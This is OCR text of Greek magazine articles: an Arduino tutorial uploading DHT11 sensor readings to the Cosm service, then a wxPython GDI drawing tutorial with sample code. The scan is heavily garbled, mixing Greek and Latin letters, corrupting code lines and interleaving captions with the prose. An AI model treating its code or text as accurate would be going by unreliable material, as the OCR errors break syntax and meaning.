#define DHTTYPE DHT22 // DHT 22 (ΑΜ2302) 
//#define DHTTYPE DHT21 // DHT 21 (AM2301) 


Όταν τις εντοπἰσουμε, ενεργοποιούµε (βγάζουμε ra //) την πρὠτη επιλο- 
yn κι απενεργοποιούµε (βάζουμε τα //) τη δεύτερη. Με αυτὸν τον τρόπο 
ενεργοποιούµε την υποστήριξη για τον δικὸ µας αισθητήρα (DHT11) και 
απενεργοποιούµε τον προεπιλεγμένο (DHT22). Μετά ano την επἐμβασήἠ 


μας, oi γραμμὲς θα πρέπει να ¿xouv ως εξής: Εικόνα 5 
To DHT11 εἰναι 

// Uncomment whatever type you're using! £vac φθηνός 
#define DHTTYPE DHT11 // DHT 11 αισθητήρας 
//#define ΡΗΤΤΥΡΕ DHT22 // DHT 22 (AM2302) θερμοκρασίας και 
//#define DHTTYPE DHT21 // DHT 21 (AM2301) υγρασίας. Με ἄλλα 


λόγια, εἶναι ακρι- 
Σημειώστε ὁτι αν δεν κάνουμε τη σωστή ρύθμιση εδώ, το πρόγραμμα θα βώς αυτό που χρει- 
εἶναι καλιμπραρισμἑνο για λάθος αισθητήρα και οι τιµές nou θα λαμβά- σζὀμασταν. Στην 
νουµε θα εἶναι αλλόκοτες! Μετά αποθηκεύουµε, πατάμε ro κουμπί Upload — ,, ο τα TOC 
κι ανοίγουμε το serial monitor. Av ο αισθητήρας µας λειτουργεὶ κανονικἀ και ο ρόλος του 
και η συνδεσμολογἱα ἐχει γίνει χωρίς λάθη, θα δούμε τη θερμοκρασία καθενός. 
και υγρασία του χώρου µας. Μετὰ απὀ αυτὸ μπορούμε να συνεχίσουμε 
χαρούμενα κι αποφασιστικά ;) 


: 37. 
: 37. 
: 37. 
= 37. 
: 37. 
ε 37. 
: 37. 


Temperature: 
Temperature: 
Temperature: 
Temperature: 
Temperature: 
Temperature: 
Temperature: 
Temperature: 
Temperature: 
Temperature: Ρ Εικόνα 6 
Temperature: 24. Πριν προχωρήσου- 
Temperature: 24. µε, αποφασίσαμε 
Temperature: 24. va ελέγξουμε τη 
λειτουργία (και τη 
συνδεσμολογία) 
του αισθητήρα 
μας. Αυτό κυρίως 
για να γλιτώσουμε 
[v] Auitoscrol | τους πονοκέφα- 
λους αργότερα... 
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To npoypappa 


Πριν ξεκινήσουμε µε την παρουσίαση του κὠδικα, πρέπει να δηµιουργή- 
coups Eva feed στο λογαριασμὸ µας oro Cosm. Πα το σκοπὸ αυτό nnyai- 
VOUHE στην υπηρεσία, κάνουμε login µε TO λογαριασμὀ µας και πατάμε TO 
κουμπί + Device/Feed. Οι ερωτήσεις που θα µας απευθύνει το σύστημα 
εἶναι πολύ απλὲς και ἐχουν περισσότερο τυπικὀ χαρακτήρα. Μπορούμε να 
συμπληρώσουμε O,TI θέλουμε. AUTO που πρέπει να προσέξουμε εἶναι το 
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Εικόνα 7 

Στο Sketch που 
ετοιμάσαµμε yia 
τις ανάγκες του 
άρθρου, πρέπει να 


File. Edit Sketch Tools Help 


αντικαταστήσετε 

τα ΑΡΙ ΚΕΥ και 

FEED ID ye riG arduino_cosm 

τιμὲς που πήρατε 

anó το Cosm. P ο μνώ 
Διαφορετικά, η i Ethernet. h> 
επικοινωνία µε i <HttpClient.h> 
την υπηρεσία θα i <Cosm.h> 


αποτύχει. ; <DHT. h> 


byte mac[] = { 
OxDE, OxaD, OxBE, ÜxEF, OxFE, OxED }; 


signed long lastConnectionTime = 0; 
const unsigned long connectionInterval = 30000; 


LosmDatastream datastreams[] = { 


< 


Arduino Une on CO 


τέλος της δημιουργίας rou feed. Εκεἰ θα ερωτηθούµε yia το εἶδος του al- 
σθητἠρα nou θα στέλνει τα δεδομένα κι εµεἰς θα πρέπει να επιλέξουμε TO 
Arduino. Αμέσως µετά το σύστημα θα µας προσφέρει Eva ἐτοιμο sketch. 
Εμεἰς δεν θα χρησιμοποιήσουμε το συγκεκριµένο sketch, αλλά θα πρέπει 
να ro κατεβάσουµε, να το ανοίξουμε και να αντιγράψουµμε δύο γραμμὲς 
ano το περιεχὀμενὀ του. Συγκεκριµένα, πρέπει να κρατήσουμε κάπου τα 
API KEY και FEED ID. 


Μετὰ ano τα παραπάνω, µπορείτε να κατεβάσετε ro sketch nou ετοιμάσα- 
µε εμείς για τις ανάγκες του ἄρθρου απὀ το 


http://bit.ly/dh017 arduino cosm 


Μόλις το avoi&ere, avrikaraorrjore ra ΑΡΙ KEY και FEED ID µε αυτά που 
κρατήσατε προηγουμένως. Όπως αντιλαμβάνεστε, αυτές οι τιμὲς χρη- 
σιμοποιούνται για τη σωστὴ κι ασφαλἠ επικοινωνία του Arduino µε το 
αντίστοιχο feed στο Cosm. Αφού προσθέσετε τις δύο τιμές, το πρὀγραμ- 
μα θα εἰναι ἐτοιμο για ανἐβασµα στο Arduino. Πριν ὁμως το ανεβάσετε 
ENITPEWTE µας να πούμε δυο λόγια για τον κὠδικα. 
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Internet of Things µε το Arduino! 
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[INFO] Initializing network... 
[INFO] System initialized! 


Autoscroll 


ÍNoline ending y| [9600baud | 


Αρχικά, κι ὁπως σε κάθε sketch, ορἰζονται μερικὲς μεταβλητές και σταθε- 
p£c. Συγκεκριμένα, ορἰζονται τα κλειδιά για την επικοινωνἰα µε το Cosm, 
το pin στο οποίο συνδέεται ο αισθητήρας µας και κάποιες βασικἐς napá- 
μετροι yia To Ethernet shield?. Εκεἰ που χρειάζεται να δώσουμε λίγη npo- 
σοχἡ εἰναι στον πίνακα datastreams. Εδὠ κρατάμε *óAa* ra datastreams 
που αποστέλλονται στο Cosm. Στο πρὀγραμμά µας έχουμε ορἰσει δύο: 
‘Eva yia τη θερμοκρασία κι Eva για την υγρασία. Κάθε datastream δημι- 
ουργείται δίνοντας Eva ὀνομα, το πλήθος των χαρακτήρων” του ονόµα- 
τος αλλά και τον τύπο των δεδομένων που θα διατηρεἰ. Τέλος, ορἰζουµε 
ἑνα αντικείμενο CosmFeed, στο onoio δίνουμε ro FEED ID, τον πίνακα 
datastreams και το πλήθος των στοιχείων του πίνακα (και πάλι το 2 õn- 
λαδἠ). Στη συνάρτηση setup αρχικοποιούµε ro hardware καλώντας τις 
απαραίτητες μεθόδους. Πρώτα an’ όλα ξεκινάμε τη σειραϊκή θύρα του 
Arduino, ano την onoia το σύστημα θα στέλνει μηνύματα στον υπολο- 
γιστἠ αναφορικἀ µε τη λειτουργία του. Στη συνέχεια ενεργοποιούµε τον 
αισθητήρα DHT11, για την καταγραφὴ των δεδομένων. Ακολουθεί η ou- 
νάρτηση loop. Auto που θέλουμε να κάνει το Arduino διαρκὠς, εἶναι να 
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Εικόνα 8 
Aakovikd μηνύμα- 
τα: τα αγαπημένα 
μας ;) Αυτό που 
μας ενδιαφέρει 
εἶναι να δούμε αν η 
σύνδεση µε το δί- 
κτυο εἰναι εφικτή. 
Στη φωτογραφία 
βλέπουμε ὁτι όλα 
πάνε καλά... 


Εικόνα 9 

Κάτι τέτοιο θα δεί- 
τε στο Cosm, όταν 
ro Arduino αρχίσει 
να στέλνει δεδο- 
μένα. Εμείς έχουμε 
µια µόνο συσκευή, 
αλλά εσείς μπορεί- 
τε να συνδέσετε 
περισσότερες. 


inj giannoug v 


Are you happy with Cosm? 


αι. 


o giannoug 


https://giannoug.gr/ 


© Followers 0 


® comments 0 
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2. Στις πρὀσφατες εκδόσεις rou Arduino IDE, To Arduino μπορεί va συνδεθεί στο δίκτυο «αυτόματα: χωρίς 
επιπλέον ρυθμίσεις and μέρους µας. Το μόνο που χρειάζεται εἶναι va ορίσουµε µια διεύθυνση MAC. 

3. H συνάρτηση strlen κάνει ακριβώς αυτἠ τη δουλειά: υπολογίζει το πλήθος των χαρακτήρων ενός string. 
Twpa, γιατὶ χρειάζεται να περνάμε *kar* To string *kar* το πλήθος των χαρακτήρων του, εἶναι µια GAAN ιστο- 
pia... :) 
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Humidity humidity 


11:00 


Temperature temperature 


Location Name: giannoug's lab 


Εικόνα 10 

To feed Tou ap- 
θρογρόφου, τις 
τελευταίες μέρες. 
To Arduino ἐχει µα- 
ζέψει NON αρκετό 
δεδοµένα! Ώρα για 
νέους και περισσόὀ- 
τερους αισθητήρες, 
δεν νομίζετε; 
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Temperate and humidity measurements of 
giannoug's laboratory. 
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Exposure: indoor 


λαμβάνει τις μετρήσεις του αισθητήρα και να τις στέλνει στο Cosm. Qu- 
σικἀ, GUTO δεν θέλουμε να γίνεται µε το μέγιστο PUBHO που μπορεί va 
πετύχει TO Arduino, διότι τότε θα στούμπωνε το δίκτυο! Έτσι, πριν anó 
κάθε επανάληψη rou loop ελέγχουμε av ἐχει περάσει Eva κἀποιο πλήθος 
milliseconds. AUTO το χρονικό διάστηµα καθορἰζεται ano τη μεταβλητή 
connectionInterval. Όταν παρέλθει To εν λόγω χρονικό διάστηµα, το npó- 
γραμμα διαβάζει τη θερμοκρασία και την υγρασία και τις αποθηκεύει σε 
δύο προσωρινές μεταβλητέὲς (t και h αντίστοιχα). Πα να περάσουμε au- 
τὲς τις δύο τιμὲς στα αντίστοιχα datastreams χρησιμοποιούμε τη μέθοδο 
setFloat. Τέλος, or£Avoupe τις νέες τιμὲς στο feed του Cosm κι ενηµε- 
ρώνουμε κατάλληλα τη μεταβλητή lastConnectionTime, yia να μπορούμε 
αργότερα να ελέγξουμε αν ἐχουν περάσει τα απαιτούμενα milliseconds 
ως την επὀµενη σύνδεση. Νομἰζουμε οτι ο κὠδικας εἶναι αρκετά απλὀς. 
Τώρα που γνωρίζετε ὀλεςτις λεπτομέρειες της λειτουργίας rou, µπορείτε 
να τον ανεβάσετε. To πρὀγραμμα εἶναι ρυθμισμέἑνο να στέλνει δεδομένα 
ava δέκα δευτερόλεπτα. Επομένως, µην αγχωθεἰτε av δεν Seite να oup- 
βαίνει κάτι αµέσως. Σε λίγα δευτερὀλεπτα οι ενδείξεις στην πλακέτα του 
Ethernet shield θα αρχίσουν ν΄’ ανάβουν ρυθμικά και οι πρὠτες μετρήσεις 
του αισθητήρα θα xouv αρχίσει το ταξίδι τους για το Cosm! Ὦρα va ße- 
βαιωθούμε *Eava* ὁτι λειτουργούν όλα σωστά... 


Τα πρὠτα δεδομένα 


Αν συνδεθούµμε τώρα στο Cosm, θα δούμε ὁτι ἐχουν προστεθεἰ αυτο- 
μάτως δύο datastreams. Πρόκειται για τα datastreams που στέλνει το 
Arduino µας. Στα δεξιά μπορούμε να δούμε τις τρἐχουσες τιμές, EVM αν 


Internet of Things µε το Arduino! 
Αα 


περιμένουμε αρκετά θα δούμε Ori σιγἁἀ-σιγά θα δημιουργείται Eva διά- 
γραμμα ano Tic τιμὲς αυτές! AUTO που μπορούμε να κάνουμε τώρα εἶναι 
va επεξεργαστούµε τις ρυθμίσεις των datastreams (πατώντας στο KOU- 
μπάκι µε το γρανάζι) και να ορἰσουμε τις κατάλληλες μονάδες μέτρησης. 
Σημειώστε πως η θερμοκρασία and τον αισθητήρα µας καταγράφεται σε 
βαθμούς Κελσίου (Celcius), ενώ η υγρασία σε ποσοστά eni της εκατὀ (96). 
Επιπλέον, μπορούμε να δώσουμε μερικὲς ακόµα πληροφορίες, n.x., για 
την τοποθεσία ano ónou λαμβάνονται οι μετρήσεις µας και διάφορα άλλα 
τέτοια. 


Κλείνοντας 


To Arduino µας εἶναι πλέον συνδεδεμένο μόνιμα στο Internet και κάθε 
δέκα δευτερόλεπτα ανεβάζει τις τιμὲς που διαβάζει and το DHT11. H npo- 
σθήκη επιπλέον αισθητήρων γίνεται πολύ εὐκολα. Αρκεὶ va δηλώσουμε 
ἑνα ακόµα datastream στον κὠδικα. Θα μπορούσαμε λοιπὀν να διαβάζου- 
μετα επἰπεδα φωτός, διοξειδίου του ἄνθρακα (*ykoux* και ἄλλων αερίων 
όπως μεθάνιο *ykoux*) αλλά και ραδιενέργειας! Με το συστηματάκι που 
δημιουργήσαμε, αυτὲς οι τιμὲς θα εἶναι σύντομα διαθέσιμες στο Internet 
και θα μπορεἰ να τις διαβάσει οποιαδήποτε ἄλλη συσκευή. Σκεφτείτε, 
π.Χ., £vav συναγερμὸ στο σπίτι, ο οποίος ενεργοποιείται όταν τα επἰπεδα 
διοξειδίου στο εργαστήριο ξεπεράσουν κάποιο ὀριο. Ποιος δεν θα ἠθελε 
τόσο ἐξυπνους και σύγχρονους αυτοματισμούς; 


παω σπς 10 
ΤΧ ΑΧ 


Εικόνα 11 


To κύκλωμα υλοποιημένο στο Fritzing. Ίσως το απλούστερο 
κύκλωμα που έχουμε συναντήσει στο περιοδικό ;) 
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Skill: 


E intermediate 
wxPython, GDI, 


Device Context, 
Data Model 


Έχοντας ολοκληρώσει τον 
wxEditor και peta ano λίγο 
πειραματισμὀ µε το wxGlade 
και τις ιδιοτροπίες της 
σχεδίασης GUI µε sizers και 
spacers, ἔχουμε σίγουρα 
κατανοήσει πὼς γράφεται 
µια εφαρµογή για το 
περιβάλλον γραφικών... 


V HAGKER 


ΧΧΧ ΧΧΧ ΧΧΧ ΧΧΧ ΧΧΧ ΑΧ ΧΧΧ ΧΑ ΧΧΧ ΧΑ ΧΧΧ Bn ΧΧΧ ΧΑΑ 


Αν το καλοσκεφτείτε, εἶναι σαν συνταγή: 
e Βάλτε μερικὰ controls o’ Eva παράθυρο 
ο Προσθέστε μενού και γραμμὴ εργαλείων 


e Χρησιμοποιήστε το wxGlade yia να φτιάξετε τους διαλόγους που 
δεν καλύπτονται απὀ ra common dialogs 


ο [ράψτε τον κὠδικα που ενώνει όλα τα παραπάνω για να µη βρε- 
θεῖτε στη δυσάρεστη θέση va κατηγορηθεἰτε ως Visual Basic 
programmer 


e Αναστενᾶξτε kai ξαναγράψτε ra μισὰ ano ra παραπάνω προκειμέ- 
νου ro πρὀγραμμἁ σας va λειτουργεὶ διαπλατφορμικἁ (αν θέλετε, 
δηλαδὴ) 

Νομίζετε λοιπὀν oT! λίγο πολύ ἐχετε τιθασεύσει τις εφαρμογές για το nE- 
ριβάλλον γραφικών, ἐτσι δεν εἶναι; Αμ, δε! Πάλι σας έχει ξεγελάσει αυτἠ 
η αναθεματισμένη η εμπειρία σας, ano τη VB! Ναι, πολλά προγράµµατα 


ello GDI! Hello GDI! 
Hello ΘΠΗΕ]Ιο G 


ello GDI! 
Hello GDI! 


Io ἀθμό GDI Hello GDiye| 


wxEditor ^-UXxX & 


Eile Edit Help 
ΠμΒΩβ οσοι ἅ ΠΒ} 


Δεν χαλάει µε τίποτα! | 


Ready 
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Puthon & uxPuthon: Σχεδίαση µε τα GDI 


ra 


περιορἱζονται σε μερικά ¿Toia controls, εικονίδια και διαλόγους, αρκετά 
ἄλλα όμως χρειάζεται να σχεδιάσουν απευθείας στο παρἀθυρὀ τους. Δεν 
μιλάμε απλώς για γραφικές εφαρμογές, αλλά για γραφικές εφαρμογές 
που ἐχουν να κάνουν µε... γραφικὰ :) Θα σας το πούμε κι αλλιώς: Να σας 
δούμε να φτιάχνετε το Paint, µε ἐτοιμα controls! Εναλλακτικά: Φτιάξτε 
την πασιἐντζα ἡ το ναρκαλιευτἠ. Σας προκαλούμε, δηλαδή. Αν αυτά τα 
σνομπάρετε, ξεκινήστε για ἄλλο παιχνίδι. Και ναι, το ξέρουμε ὁτι για 
παιχνίδια πιθανώς θα πηγαϊνατε προς ro PyGame, αλλά η πασιέντζα δεν 
εἶναι ακριβώς Space Invaders, για να τη φτιάξετε µε τη λογική frame- 
based. 


Για va εἰμαστε nio akpifeic, φαίνεται ὁτι τα περισσότερα προγράµµατα 
nou δεν διαθέτουν απευθείας σχεδίαση εἶναι τα πλέον βαρετὰ. Ξέρετε 
τώρα: επεξεργαστὲς κειμένου, calculators, υπολογιστικές εφαρμογὲς 
K.d. Q µη γένοιτο, ακόµα και πρὀγραμμα για κλιμακωτὲς χρεώσεις της 
ΔΕΗ unopei να γράψετε. Λέγεται άλλωστε OTI το συγκεκριµένο πρὀτζεκτ 
ονειρεύονται συχνὰ oi wxPython programmers, που ξυπνάνε καταΐδρω- 
μένοι και µε ταχυπαλμἰα. Σαν τον εφιάλτη στο δρόμο με τις λεύκες, Eva 
πράγμα. 


Τι χρειαζόμαστε όμως yia να γράψουμε πρόγραμμα µε πραγματικἁ ypa- 
φικἀ; Κάτι που να σχεδιάζει γραμμές, κύκλους, γραφικὲς παραστάσεις ἡ 
ακόµα και κἀτι που να µας επιτρέπει να χρησιμοποιήσουμε το novriki για 
να φτιάξουμε το δικὀ µας σχέδιο; Εδώ, φίλοι µου, χρειάζεται πλέον va 
μιλήσουμε για To GDI. 


Graphics Device Interface rj αλλιώς GDI 


Το GDI δεν εἶναι τίποτα ἄλλο ano µια σειρἀ κλάσεων και μεθόδων για va 
δουλεύουμε ypagika απευθείας στο παρἀθυρὀ µας. Ἡ στον εκτυπωτή 
μας. Ἡ οπουδήποτε αλλού µπορεί κανεὶς να σχεδιάσει γραμμὲς, κύκλους 
και γενικότερα σχήματα. Βλέπετε, το GDI εἶναι device independent. Εἶναι 
σαν ἑνα ενδιάμεσο στάδιο ανάμεσα στο πρὀγραμμὰ µας και στο hardware. 
Δεν χρειάζεται να γνωρἰζουµετις ιδιαιτερότητες TOU υλικού στο οποίο θα 
απευθυνθούμε για τη σχεδίαση. Οι κλάσεις του GDI ασχολούνται µε τρία 
βασικἁ στοιχεία: 


e Δισδιάστατα (2D) διανυσματικἁ γραφικά (π.χ., γραμμὲς και κύκλοι) 
ο [ραμματοσειρἐς 
ο Εικόνες 


Ακριβώς επειδἠ το GDI επιτρέπει τη χρήση διάφορων συσκευών εκτὸς 
ano την οθόνη, την πλέον συνηθισμένη συσκευἠ εξόδου, για va ξεκινήἠ- 
coups τη σχεδίαση µας πρέπει πρώτα να δημιουργήσουμε ἡ va ανακτή- 
coups Eva αντικείµενο DC, Device Context. 


Συμφραζόμενα; Τι εννοεῖ ο ποιητής µε ra Device Contexts; 


H λέξη «context» αποδίδεται ως «συμφραζόμενα» και ακούγεται ελα- 
Φφρώς αστεἰα yia τη συγκεκριμένη χρήση. Σκεφτείτε ὁμως ὁτι TO λε- 
γόμενο device context, ἡ DC όπως θα το λέμε για συντομία, εἶναι το 
αντικείµενο που επιτρέπει τη σχεδίαση σε οποιαδήποτε συσκευἠ εξόδου, 
κάνοντας EOWTEPIKA O,TI χρειάζεται για να εξασφαλίσει ότι οι δικἐς µας 
εντολὲς σχεδίασης μεταφράζονται στις αντἰστοιχες που αντιλαμβάνεται 
η εκάστοτε συσκευή. 
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Έτσι, μπορούμε να χρησιμοποιήσουμε την ἴδια εντολἠ για να τραβήξου- 
µε µια γραμμὴ στην οθόνη ἡ στον εκτυπωτή — και όλοι ξέρουμε πόσο 
διαφορετικά θα λειτουργήσουν αυτὲς οι δύο συσκευὲς για να δείξουν τη 
γραμμή. 


To wx toolkit παρέχει το wx.DC class αλλά και µια σειρἀ ano παράγωγα 
classes, ra οποία εἶναι και τα συχνότερα χρησιμοποιούμενα. Σε πρώτη 
φάση: θα δούμε δύο and αυτά: τα wx.ClientDC και wx.PaintDC. 


Στο εισαγωγικό µας άρθρο yia το wxPython εἰχαμε ἠδη va προγραμματά- 
KI που σχεδίαζε χρωματιστά κουτάκια στην οθόνη χρησιμοποιώντας KÅ- 
ποια ano τα παραπάνω, αλλά δεν μπήκαμε σε λεπτομέρειες. Ας φτιάξουμε 
κἀτι αντίστοιχο για va πειραματιστούµε. 


import wx 
class DrawPanel(wx.Frame): 
def init (self): 


super(DrawPanel,self). init (parent-None, 
size=(640,480),title="Device Context... Nightmares") 


self.Bind(wx.EVT PAINT, self.OnPaint) 

self.Bind(wx.EVT LEFT DOWN, self.WriteMessage) 
def WriteMessage(self, e): 

dc = wx.ClientDC(self) 


dc.SetFont(wx.Font(24, wx.FONTFAMILY SWISS, 
wWwx.FONTSTYLE NORMAL, wx.FONTWEIGHT_BOLD) ) 


dc.SetTextForeground(wx.Colour(0,0,255)) 
x Ξ e.GetX() 
y Ξ e.GetY() 
dc.DrawText('Hello GDI!",x,y) 
e.Skip() 
def OnPaint(self, e): 
dc = wx.PaintDC(self) 
dc.SetPen(wx.Pen(wx.Colour(255,0,0))) 


dc.SetBrush(wx.Brush(wx.Colour(255,0,0))) 
dc.DrawCircle(320,240,240) 
def main(): 
app = wx.App(False) 
frame = DrawPanel() 
frame. Show() 
app .MainLoop() 
if name == '_main_': 
main() 


EKTEAEOTE TO και παρατηρήστε τη συμπεριφορά του: Apxikà εμφανίζει 
vav κὀκκινο κύκλο, στο KEVTPO του παραθύρου. Όπου κάνετε αριστερὀ 
κλικ μέσα στο παράθυρο, εµφανίζεται το µπλε κείμενο «Hello GDI!». Όλα 
δείχνουν va πηγαίνουν µια χαρά, μέχρι τη στιγµἠ nou κἀποιο ἆλλο na- 


Python ἃ wxPython: Σχεδίαση µε to 


ra 


ράθυρο περάσει --όλως τυχαίως-- πάνω ano ro πρὀγραµµα µας. 'H ἴσως 
πάλι εἰχατε τη φαεινἠ ιδέα να το κάνετε minimize. Σε κάθε περίπτωση xå- 
νονται τα πάντα κι εμφανίζεται ξανὰ μόνον ο κύκλος. Τι ακριβώς γίνεται; 


Κάθε φορά που ro napá8upó µας χρειάζεται να σχεδιαστεἰ, εἶτε ENEI- 
δἠ μόλις δημιουργήθηκε eire επειδἠ ὁλο ἡ μέρος του περιεχοµένου του 
καταστράφηκε ano κἀποιο ἄλλο, µας έρχεται Eva wx.EVT. PAINT event. 
Ὅπως βλέπετε, στην init το έχουμε κάνει Bind µε τη συνάρτηση OnPaint, 
η onoia περιέχει: 


def OnPaint(self, e): 
dc = wx.PaintDC(self) 
dc.SetPen(wx.Pen(wx.Colour(255,0,0,))) 
dc.SetBrush(wx.Brush(wx.Colour(255,0,0))) 
dc.DrawCircle(320,240,240) 


Προσέξτε: Σε κάθε περίπτωση που σχεδιάζουμε ro περιεχὀμενὀ µας εξαι- 
Tiag του wx.EVT. PAINT, πρέπει να λάβουμε το DC μέσω της wx.PaintDC: 


dc = wx.PaintDC(self) 


Μάλιστα, για va εἰμαστε ακριβείς, πρέπει να πάρουμε το συγκεκριµένο 
DC μέσα στην OnPaint ακόµη και αν δεν ἐχουμε OKONO να το Χρησιμο- 
ποιήσουμε! (Auto βεβαια θα ἦταν κάπως περἰεργο.) Έχοντας ro DC ava 


Simple Drawing Program = [ol >. 


b 


Εντάξει, δεν θα µας προσλάβετε va σας φτιάχνουμε graffiti. Μπορούμε όµως va 
σας φτιάξουμε τα χρώματα µε τις wx.Colour, wx.Brush kai wx.Pen. Στην εικὀνα 
φαίνεται µια απόπειρα va τραβήξουμε μερικὲς γραμμές µε το απλὀ npóypauua 
χονδροειδούς σχεδίασης που δημιουργήσαμε, προκειµένου να μελετήσουμε 
καλύτερα To GDI και To data model που απαιτεί Eva πρὀγραμμα σχεδίασης. 
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χείρας, δημιουργούμε Eva Pen κι ἑνα Brush. Στη σχεδίαση rou GDI, το 
pen φυσικἁ χρησιμοποιείται για τα περιγράμματα των σχημάτων και το 
Brush για το γέμισμα. Αν παραλεἰπαμε ro Brush, ο κύκλος µας θα ἦταν 
απλὠὼς ἁδειος. Επιλέγουµε να δημιουργήσουμε και να επιλέξουμε το Pen/ 
Brush σε µια μοναδική εντολἠ yia το καθένα: 


dc.SetPen(wx.Pen(wx.Colour(255,0,0))) 


Ουσιαστικἁ, επιλἐγουµε ro Pen nou δημιουργούμε καλώντας TOV 
constructor wx.Pen και δἰνοντάς του Eva χρώμα nou δημιουργούμε 
επίσης απευθείας, καλώντας τον constructor του wx.Colour µε χρώμα 
RGB=(255,0,0), δηλαδή kókkivo. Και vai, θα μπορούσαμε να κάνουμε 
nesting κι ἄλλα constructors εδώ µέσα, αλλά ο καφές δεν ἡταν αρκετά 
δυνατός. Παρατηρήστε OT! το αντικείµενο δεν αποθηκεύεται σε κἄποιο 
object variable της κλάσης: εἶναι εντελὠς προσωρινὀ. Το δημιουργούμε, 
το επιλέγουμε, το χρησιμοποιούμε και το στέλνουμε στο καλὀ! Αυτὀ εἰναι 
TUNIKO για ra αντικείμενα του εἶδους. Εἶναι μετά πολὺ εὐκολο να φτιάξου- 
HE τον κύκλο µας µε τη DrawCircle, που ἐχει ως μόνες παραμέτρους τις 
συντεταγμένες του κέντρου και την ακτίνα του. 


Σε αντίθεση, δείτε µε ποιο τρόπο γράφουμε το κείμενο «Hello GDI!». 
Έχουμε συνδέσει TO event wx.EVT LEFT DOWN µε τη συνάρτηση 
WriteMessage: 


def WriteMessage(self, e): 
dc = wx.ClientDC(self) 


dc.SetFont(wx.Font(24, wx.FONTFAMILY SWISS, 
wx.FONTSTYLE NORMAL, wx.FONTWEIGHT BOLD)) 


dc.SetTextForeground(wx.Colour(0,0,255)) 
e.GetX() 

y Ξ e.GetY() 

dc.DrawText('Hello GDI!",x,y) 

e.Skip() 


Εδώ δεν χρησιμοποιούμε το wx.PaintDC. Αυτό επιτρέπεται *uóvo* στη 
συνάρτηση που λαμβάνει το wx.EVT PAINT. Σε κάθε άλλη περίπτωση 
που σχεδιάζουμε στο παράθυρο µας, πρέπει να χρησιμοποιήσουμε την 
wx.ClientDC. Όπως και προηγουμένως, χρησιμοποιούμε μερικά nested 
calls σε constructors yia να ορἰσουμε Eva Font κι Eva χρώμα κειµένου 
(κατἀ παράδοση, yia το κείμενο δεν χρησιμοποιείται το Pen ἡ ro Brush, 
αλλά υπάρχουν ra SetTextForeground και SetTextBackground). Και φυ- 
σικἀ, κι αυτά τα αντικείμενα εἶναι προσωρινά. H GetX και GetY παίρνουν 
τις συντεταγμένες ano To event του ποντικιού. H εντολἠ Skip() στο TÈ- 
λος εξασφαλίζει ὁτι θα εκτελεστεἰ και η προκαθορισμένη ενέργεια για το 
αριστερό κλικ του ποντικιού. Av δεν τη βάλετε, ἴσως va µη µπορείτε να 
κάνετε ενεργό το παράθυρο της εφαρµογής σας. 


x 


Εντάξει λοιπὀν, νομίζετε ὁτι το ἐχετε κατανοήσει. Καλά κάνετε και vopi- 
Çete. Nati αν έχετε καταλάβει AUTO nou νομἰζουµε πως ἐχετε καταλάβει, 
το ἐχετε καταλάβει λάθος! (Κάτι ἐχει γίνει µε τον καφὲ σήμερα.) Νομίζε- 
τε, λοιπὀν, τα ακόλουθα. 


1. Κάθε φορὰ που το παράθυρο «καταστρέφεται» and κάποιο ἆλλο 
ἡ επειδἠ το κάνατε resize/minimize, καλείται ¿neira η OnPaint. 
Σωστά. 


Python ἃ wxPython: Σχεδίαση 


pe to GDI 


“4” 


2. Καθώς το κεὶμενόὸ µας δεν σχεδιάζεται µέσα στην OnPaint αλλά σε 
ἄλλη συνάρτηση, δεν μπορεὶ va επανασχεδιαστεἰ. Σωστά. 


3. Κάθε φορά που καλείται η OnPaint, ολὀκληρος ο κύκλος σχεδιάζε- 
ται ano την αρχἠ. Αν εἰχαμε βάλει το μήνυμα μέσα στον κύκλο, θα 
εξαφανιζὀταν στην επανασχεδἰαση. ΛΑΘΟΣ! 


Δοκιμάστε λοιπὀν To εξἠς πείραμα. Εκτελἐστε το npóypaupa και κάντε 
κλικ μερικὲς φορὲς μέσα στον κύκλο, για να πάρετε το μήνυμα σε διάφο- 
ρα σηµεία. Καλύψτε ropa μερικῶς τον κύκλο µε Eva ἆλλο παράθυρο και 
στη συνέχεια καλέστε NGAI το πρὀγραμμὰ µας σε πρὠτο πλάνο. Θα δείτε 
τον κύκλο µια χαρὰ, αλλά και τα υπολείμματα του κειμένου µέσα του! Δεν 


εἶναι δυνατὸν να ξανασχεδιάστηκε 
όλος ο κύκλος και να µην έσβησε 
το κείμενο! 


Κάθε φορὰ που λαμβάνουμε Eva 
DC µε την PaintDC, η σχεδἰαση 
περιορίζεται στα τμήματα rou na- 
ραθύρου nou xouv πραγματικἁ 
χαλάσει. 


ο Αν έχουν καλυφθεί περιοχὲς 
ano ἆλλα παράθυρα, σχεδιά- 
ζονται μόνον αυτές. Πρόκει- 
ται για το λεγόμενο clipping 
area. 


ο Σε ορισμένες περιπτώσεις, 
TO clipping area εἶναι ολὀ- 
κληρη η περιοχή σχεδίασης 
του παραθύρου: ὀταν το 
πρὀγραμμα ξεκινάει να EKTE- 
λείται ἡ --ανάλογα µε τις 
ρυθμίσεις και το λειτουργι- 
KO— όταν κάνουμε resize ἡ 
minimize/restore ro παρά- 
8upó µας. 

Καταλάβαμε ropa nog πραγµα- 
τικὰ λειτουργεί το wx.PaintDC, 
αλλά εξακολουθούμε va έχουμε 
πρόβλημα: το πρὀγραμμἁ µας xå- 
νει τα «δεδομένα» rou απλἀ ὅταν 
επικαλύπτουμε TO παρἀθυρὀ του. 
Κάθε εφαρµογἠ wx θα πρέπει va 
εἶναι ETOIUN va επανασχεδιάσει το 
παρἀθυρὀ της µε ὁλα ra περιεχὀ- 
μενὰ TOU, ως ανταπόκριση ενὸς 
wx.EVT PAINT. H δικἠ µας σχε- 
διάζει µόνο τον κύκλο, ο οποίος 
κάλλιστα μπορεί να θεωρηθεὶ και 
background. H OnPaint πρέπει 
να εκπαιδευτεὶ ὥστε να σχεδιάζει 
κι ὁ,τι κάναμε Non μέσα ano την 
WriteMessage. Εἶναι εμφανές ὁτι 
το πρὀγραμμἁ µας στερεἰται Data 
Model. 


Controller 


To πρὀγραμμά µας στην πραγματικότητα υλοποιεί το µο- 
ντέλο MVC: Model - View - Controller. To model περιἐχει 
την εσωτερική αναπαράσταση των δεδομένων. Πα το απλό 
µας πρὀγραμµα σχεδίασης εἶναι απλώς µια λίστα µε σηµεία, 
μεταξύ των οποίων σχεδιάζονται οι γραμμές. O controller 
εἶναι το Τµήµα του προγράµµατος που αλληλεπιδρά µε 

το χρήστη ki ενημερώνει ro model (όταν κάνουμε κλικ 
προστίθενται σημεία στη λίστα, ενώ ταυτὀχρονα ενημερώ- 
